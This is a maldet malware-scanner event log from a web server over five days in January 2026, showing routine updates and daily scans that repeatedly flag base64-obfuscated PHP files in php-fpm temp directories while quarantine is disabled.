Jan 19 2026 04:32:37 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696defbfc5805.php
Jan 19 2026 04:32:37 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696cfc60cd1f3.php
Jan 19 2026 04:32:37 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696dc33682b6b.php
Jan 19 2026 04:32:37 web1 maldet(1249948): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 635, malware hits 38, cleaned hits 0, time 55s
Jan 19 2026 04:32:37 web1 maldet(1249948): {scan} scan report saved, to view run: maldet --report 260119-0431.1249948
Jan 19 2026 04:32:37 web1 maldet(1249948): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260119-0431.1249948
Jan 19 2026 11:01:08 web1 maldet(1158): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Jan 20 2026 04:34:34 web1 maldet(278109): {update} checking for available updates...
Jan 20 2026 04:34:34 web1 maldet(278109): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 20 2026 04:34:34 web1 maldet(278109): {update} hashing install files and checking against server...
Jan 20 2026 04:34:34 web1 maldet(278109): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 20 2026 04:34:34 web1 maldet(278109): {update} latest version already installed.
Jan 20 2026 04:34:34 web1 maldet(278218): {sigup} performing signature update check...
Jan 20 2026 04:34:34 web1 maldet(278218): {sigup} local signature set is version 202601191671201
Jan 20 2026 04:34:34 web1 maldet(278218): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 20 2026 04:34:34 web1 maldet(278218): {sigup} latest signature set already installed
Jan 20 2026 04:34:34 web1 maldet(278306): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 20 2026 04:34:35 web1 maldet(278306): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 20 2026 04:34:35 web1 maldet(278306): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 20 2026 04:34:35 web1 maldet(278306): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 20 2026 04:34:35 web1 maldet(278306): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 20 2026 04:35:07 web1 maldet(278306): {scan} file list completed in 32s, found 1854 files...
Jan 20 2026 04:35:07 web1 maldet(278306): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 20 2026 04:35:07 web1 maldet(278306): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (1854 files) in progress...
Jan 20 2026 04:35:44 web1 maldet(278306): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-bdd3ffd98da44b47bf3cc04c431b075e-ea-php83-php-fpm.service-dz4N7a/tmp/run_696eeafe51f34.php
Jan 20 2026 04:35:44 web1 maldet(278306): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-bdd3ffd98da44b47bf3cc04c431b075e-ea-php83-php-fpm.service-dz4N7a/tmp/run_696e88cd96988.php
Jan 20 2026 04:35:44 web1 maldet(278306): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-bdd3ffd98da44b47bf3cc04c431b075e-ea-php83-php-fpm.service-dz4N7a/tmp/run_696f18a998924.php
Jan 20 2026 04:35:44 web1 maldet(278306): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-bdd3ffd98da44b47bf3cc04c431b075e-ea-php83-php-fpm.service-dz4N7a/tmp/run_696f1b89a912a.php
Jan 20 2026 04:35:45 web1 maldet(278306): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-bdd3ffd98da44b47bf3cc04c431b075e-ea-php83-php-fpm.service-dz4N7a/tmp/run_696f4e7aeab58.php
Jan 20 2026 04:35:45 web1 maldet(278306): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-bdd3ffd98da44b47bf3cc04c431b075e-ea-php83-php-fpm.service-dz4N7a/tmp/run_696f4eb170a98.php
Jan 20 2026 04:35:45 web1 maldet(278306): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-bdd3ffd98da44b47bf3cc04c431b075e-ea-php83-php-fpm.service-dz4N7a/tmp/run_696eba35d0d7a.php
Jan 20 2026 04:35:45 web1 maldet(278306): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696e587e3692d.php
Jan 20 2026 04:35:45 web1 maldet(278306): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696e20e09b2bf.php
Jan 20 2026 04:35:45 web1 maldet(278306): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696e5391668cd.php
Jan 20 2026 04:35:45 web1 maldet(278306): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-bdd3ffd98da44b47bf3cc04c431b075e-ea-php83-php-fpm.service-dz4N7a/tmp/run_696eeafe51f34.php
Jan 20 2026 04:35:45 web1 maldet(278306): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-bdd3ffd98da44b47bf3cc04c431b075e-ea-php83-php-fpm.service-dz4N7a/tmp/run_696e88cd96988.php
Jan 20 2026 04:35:45 web1 maldet(278306): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-bdd3ffd98da44b47bf3cc04c431b075e-ea-php83-php-fpm.service-dz4N7a/tmp/run_696f18a998924.php
Jan 20 2026 04:35:45 web1 maldet(278306): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-bdd3ffd98da44b47bf3cc04c431b075e-ea-php83-php-fpm.service-dz4N7a/tmp/run_696f1b89a912a.php
Jan 20 2026 04:35:45 web1 maldet(278306): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-bdd3ffd98da44b47bf3cc04c431b075e-ea-php83-php-fpm.service-dz4N7a/tmp/run_696f4e7aeab58.php
Jan 20 2026 04:35:45 web1 maldet(278306): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-bdd3ffd98da44b47bf3cc04c431b075e-ea-php83-php-fpm.service-dz4N7a/tmp/run_696f4eb170a98.php
Jan 20 2026 04:35:45 web1 maldet(278306): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-bdd3ffd98da44b47bf3cc04c431b075e-ea-php83-php-fpm.service-dz4N7a/tmp/run_696eba35d0d7a.php
Jan 20 2026 04:35:45 web1 maldet(278306): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696e587e3692d.php
Jan 20 2026 04:35:45 web1 maldet(278306): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696e20e09b2bf.php
Jan 20 2026 04:35:45 web1 maldet(278306): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696e5391668cd.php
Jan 20 2026 04:35:45 web1 maldet(278306): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 1854, malware hits 20, cleaned hits 0, time 71s
Jan 20 2026 04:35:45 web1 maldet(278306): {scan} scan report saved, to view run: maldet --report 260120-0434.278306
Jan 20 2026 04:35:45 web1 maldet(278306): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260120-0434.278306
Jan 20 2026 07:08:48 web1 maldet(1146): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Jan 21 2026 04:10:21 web1 maldet(385673): {update} checking for available updates...
Jan 21 2026 04:10:21 web1 maldet(385673): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 21 2026 04:10:21 web1 maldet(385673): {update} hashing install files and checking against server...
Jan 21 2026 04:10:21 web1 maldet(385673): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 21 2026 04:10:21 web1 maldet(385673): {update} latest version already installed.
Jan 21 2026 04:10:21 web1 maldet(385782): {sigup} performing signature update check...
Jan 21 2026 04:10:21 web1 maldet(385782): {sigup} local signature set is version 202601191671201
Jan 21 2026 04:10:21 web1 maldet(385782): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 21 2026 04:10:21 web1 maldet(385782): {sigup} latest signature set already installed
Jan 21 2026 04:10:21 web1 maldet(385870): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 21 2026 04:10:22 web1 maldet(385870): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 21 2026 04:10:22 web1 maldet(385870): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 21 2026 04:10:22 web1 maldet(385870): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 21 2026 04:10:22 web1 maldet(385870): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 21 2026 04:11:00 web1 maldet(385870): {scan} file list completed in 38s, found 51264 files...
Jan 21 2026 04:11:00 web1 maldet(385870): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 21 2026 04:11:00 web1 maldet(385870): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (51264 files) in progress...
Jan 21 2026 04:17:54 web1 maldet(385870): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_69703f09e9876.php
Jan 21 2026 04:17:54 web1 maldet(385870): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_696faf799bc42.php
Jan 21 2026 04:17:54 web1 maldet(385870): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_69703fa57b175.php
Jan 21 2026 04:17:54 web1 maldet(385870): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_696fafff6b0fd.php
Jan 21 2026 04:17:54 web1 maldet(385870): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_696fe2966e10c.php
Jan 21 2026 04:17:54 web1 maldet(385870): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_6970735b76aa4.php
Jan 21 2026 04:17:54 web1 maldet(385870): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_6970702db85ff.php
Jan 21 2026 04:17:54 web1 maldet(385870): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_697070784d400.php
Jan 21 2026 04:17:54 web1 maldet(385870): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_696fdffcf2c4d.php
Jan 21 2026 04:17:54 web1 maldet(385870): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_69707310a8c48.php
Jan 21 2026 04:17:54 web1 maldet(385870): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_696fdf56133c0.php
Jan 21 2026 04:17:54 web1 maldet(385870): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-bdd3ffd98da44b47bf3cc04c431b075e-ea-php83-php-fpm.service-dz4N7a/tmp/run_696f7cf8ca0a1.php
Jan 21 2026 04:17:54 web1 maldet(385870): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_69703f09e9876.php
Jan 21 2026 04:17:54 web1 maldet(385870): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_696faf799bc42.php
Jan 21 2026 04:17:54 web1 maldet(385870): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_69703fa57b175.php
Jan 21 2026 04:17:54 web1 maldet(385870): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_696fafff6b0fd.php
Jan 21 2026 04:17:54 web1 maldet(385870): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_696fe2966e10c.php
Jan 21 2026 04:17:54 web1 maldet(385870): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_6970735b76aa4.php
Jan 21 2026 04:17:54 web1 maldet(385870): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_6970702db85ff.php
Jan 21 2026 04:17:54 web1 maldet(385870): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_697070784d400.php
Jan 21 2026 04:17:55 web1 maldet(385870): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_696fdffcf2c4d.php
Jan 21 2026 04:17:55 web1 maldet(385870): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_69707310a8c48.php
Jan 21 2026 04:17:55 web1 maldet(385870): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_696fdf56133c0.php
Jan 21 2026 04:17:55 web1 maldet(385870): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-bdd3ffd98da44b47bf3cc04c431b075e-ea-php83-php-fpm.service-dz4N7a/tmp/run_696f7cf8ca0a1.php
Jan 21 2026 04:17:55 web1 maldet(385870): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 51264, malware hits 24, cleaned hits 0, time 454s
Jan 21 2026 04:17:55 web1 maldet(385870): {scan} scan report saved, to view run: maldet --report 260121-0410.385870
Jan 21 2026 04:17:55 web1 maldet(385870): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260121-0410.385870
Jan 22 2026 04:04:33 web1 maldet(775391): {update} checking for available updates...
Jan 22 2026 04:04:33 web1 maldet(775391): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 22 2026 04:04:33 web1 maldet(775391): {update} hashing install files and checking against server...
Jan 22 2026 04:04:33 web1 maldet(775391): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 22 2026 04:04:33 web1 maldet(775391): {update} latest version already installed.
Jan 22 2026 04:04:33 web1 maldet(775500): {sigup} performing signature update check...
Jan 22 2026 04:04:34 web1 maldet(775500): {sigup} local signature set is version 202601191671201
Jan 22 2026 04:04:34 web1 maldet(775500): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 22 2026 04:04:34 web1 maldet(775500): {sigup} new signature set 202601222641432 available
Jan 22 2026 04:04:34 web1 maldet(775500): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Jan 22 2026 04:04:34 web1 maldet(775500): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Jan 22 2026 04:04:34 web1 maldet(775500): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Jan 22 2026 04:04:34 web1 maldet(775500): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Jan 22 2026 04:04:34 web1 maldet(775500): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Jan 22 2026 04:04:34 web1 maldet(775500): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Jan 22 2026 04:04:34 web1 maldet(775500): {sigup} verified md5sum of maldet-sigpack.tgz
Jan 22 2026 04:04:34 web1 maldet(775500): {sigup} unpacked and installed maldet-sigpack.tgz
Jan 22 2026 04:04:34 web1 maldet(775500): {sigup} verified md5sum of maldet-clean.tgz
Jan 22 2026 04:04:34 web1 maldet(775500): {sigup} unpacked and installed maldet-clean.tgz
Jan 22 2026 04:04:34 web1 maldet(775500): {sigup} signature set update completed
Jan 22 2026 04:04:35 web1 maldet(775500): {sigup} 17638 signatures (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 22 2026 04:04:35 web1 maldet(775702): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 22 2026 04:04:35 web1 maldet(775702): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 22 2026 04:04:35 web1 maldet(775702): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 22 2026 04:04:35 web1 maldet(775702): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 22 2026 04:04:35 web1 maldet(775702): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 22 2026 04:05:08 web1 maldet(775702): {scan} file list completed in 33s, found 8929 files...
Jan 22 2026 04:05:08 web1 maldet(775702): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 22 2026 04:05:08 web1 maldet(775702): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (8929 files) in progress...
Jan 22 2026 04:07:04 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_6970d8e02cd40.php
Jan 22 2026 04:07:04 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_697109fa161b2.php
Jan 22 2026 04:07:04 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_69719d462549d.php
Jan 22 2026 04:07:04 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_6970d66d6492c.php
Jan 22 2026 04:07:04 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_69719dfc48d54.php
Jan 22 2026 04:07:04 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_6971cf9c9526d.php
Jan 22 2026 04:07:04 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_6971cdf56e0a0.php
Jan 22 2026 04:07:04 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_6971377267396.php
Jan 22 2026 04:07:04 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_69716bcad98bc.php
Jan 22 2026 04:07:04 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_6970a76e36057.php
Jan 22 2026 04:07:04 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_697199862e11d.php
Jan 22 2026 04:07:04 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_6970a6edc1d3a.php
Jan 22 2026 04:07:04 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_697199dc12398.php
Jan 22 2026 04:07:04 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_69719e2e5ac24.php
Jan 22 2026 04:07:04 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_6970d8e02cd40.php
Jan 22 2026 04:07:04 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_697109fa161b2.php
Jan 22 2026 04:07:04 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_69719d462549d.php
Jan 22 2026 04:07:04 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_6970d66d6492c.php
Jan 22 2026 04:07:04 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_69719dfc48d54.php
Jan 22 2026 04:07:05 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_6971cf9c9526d.php
Jan 22 2026 04:07:05 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_6971cdf56e0a0.php
Jan 22 2026 04:07:05 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_6971377267396.php
Jan 22 2026 04:07:05 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_69716bcad98bc.php
Jan 22 2026 04:07:05 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_6970a76e36057.php
Jan 22 2026 04:07:05 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_697199862e11d.php
Jan 22 2026 04:07:05 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_6970a6edc1d3a.php
Jan 22 2026 04:07:05 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_697199dc12398.php
Jan 22 2026 04:07:05 web1 maldet(775702): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-446d38b459ff45c1b265d82d2d9ecde7-ea-php83-php-fpm.service-EFxyGg/tmp/run_69719e2e5ac24.php
Jan 22 2026 04:07:05 web1 maldet(775702): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 8929, malware hits 28, cleaned hits 0, time 150s
Jan 22 2026 04:07:05 web1 maldet(775702): {scan} scan report saved, to view run: maldet --report 260122-0404.775702
Jan 22 2026 04:07:05 web1 maldet(775702): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260122-0404.775702
Jan 22 2026 07:51:34 web1 maldet(1168): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Jan 23 2026 03:51:20 web1 maldet(331291): {update} checking for available updates...
Jan 23 2026 03:51:20 web1 maldet(331291): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 23 2026 03:51:20 web1 maldet(331291): {update} hashing install files and checking against server...
Jan 23 2026 03:51:20 web1 maldet(331291): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 23 2026 03:51:20 web1 maldet(331291): {update} latest version already installed.
Jan 23 2026 03:51:20 web1 maldet(331401): {sigup} performing signature update check...
Jan 23 2026 03:51:20 web1 maldet(331401): {sigup} local signature set is version 202601222641432
Jan 23 2026 03:51:20 web1 maldet(331401): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 23 2026 03:51:20 web1 maldet(331401): {sigup} latest signature set already installed
Jan 23 2026 03:51:20 web1 maldet(331490): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
